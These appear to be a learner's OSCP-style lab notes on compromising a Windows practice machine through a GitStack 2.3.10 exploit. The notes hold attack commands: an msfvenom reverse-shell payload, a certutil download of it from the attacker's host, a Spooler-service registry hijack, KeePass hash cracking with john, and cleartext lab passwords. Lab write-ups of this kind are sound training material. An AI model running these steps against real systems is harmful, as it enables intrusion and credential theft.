cyber-labs-9-Stack - My-oscp-all-things

machine ipaddress : 172.31.1.12 ``` Open 172.31.1.12:80 Open 172.31.1.12:139 Open 172.31.1.12:135 Open 172.31.1.12:445 Open 172.31.1.12:3389 Open 172.31.1.12:5985 Open 172.31.1.12:47001 Open 172.31.1.12:49152 Open 172.31.1.12:49153 Open 172.31.1.12:49154 Open 172.31.1.12:49155 Open 172.31.1.12:49162 Open 172.31.1.12:49163 Open 172.31.1.12:49164 ``` port of 80 is a django site ![[Pasted image 20220110221618.png]] ``` ^registration/login/$ ^gitstack/ ^rest/ ``` ![[Pasted image 20220110221658.png]] ![[Pasted image 20220110221752.png]] ``` gitstack 2.3.10 searchsploit gitstack ``` ![[Pasted image 20220110221807.png]] ![[Pasted image 20220110221905.png]] ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.33 LPORT=23 -f exe -o rev.exe change the payload -> command ->whoami -> certutil -urlcache -split -f http://10.10.0.33/rev.exe ``` ![[Pasted image 20220110222053.png]] ![[Pasted image 20220110222129.png]] and we can reverse a shell. ![[Pasted image 20220110222220.png]] ![[Pasted image 20220110222229.png]] ![[Pasted image 20220110222346.png]] ``` type C:\Windows\Panther\Unattend.xml generalize oobeSystem specialize ``` ``` C:\Users\john\Documents\password_manager.kdbx <DatabasePath>..\..\Users\john\Documents\Database2.kdbx</DatabasePath> <DatabasePath>..\..\Users\john\Documents\Database.kdbx</DatabasePath> C:\Users\john\AppData\Roaming\KeePass\KeePass.config.xml C:\Program Files (x86)\KeePass Password Safe 2\KeePass.config.xml ``` ![[Pasted image 20220110232315.png]] ``` HKEY_LOCAL_MACHINE\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler ``` ![[Pasted image 20220110235308.png]] ``` reg add HKLM\SYSTEM\CurrentControlSet\Services\Spooler /v ImagePath /t REG_EXPAND_SZ /d C:\users\john\desktop\rev.exe /f ``` rp wp ![[Pasted image 20220110235540.png]] ![[Pasted image 20220110235548.png]] ``sc start spooler`` ![[Pasted image 20220110235902.png]] ``` keepass2john pass.kdbx >> hash ``` ![[Pasted image 20220111001142.png]] ![[Pasted image 20220111001448.png]] ``` john --wordlist=/usr/share/wordlists/rockyou.txt hash --show the pass is : princess ``` ``` administrator : secur3_apass262 ``` ![[Pasted image 20220111001659.png]] ![[Pasted image 20220111001841.png]] e3ce12b1bb796932868b0d793c9fac3c okay thanks. 纪念一下我的努力 ![[Pasted image 20220111001942.png]] 为了证明我之前修改了登录上去试试。 ![[Pasted image 20220111002343.png]] 最后验证下john到底提权成功没有。开启它并登录 ``` xfreerdp /u:john /p:s3cret123SEc /v:172.31.1.12 ``` ![[Pasted image 20220111003039.png]] 看来并没有成功。。。大概从9点30 -12:30 3个小时才进行最后的成功提权。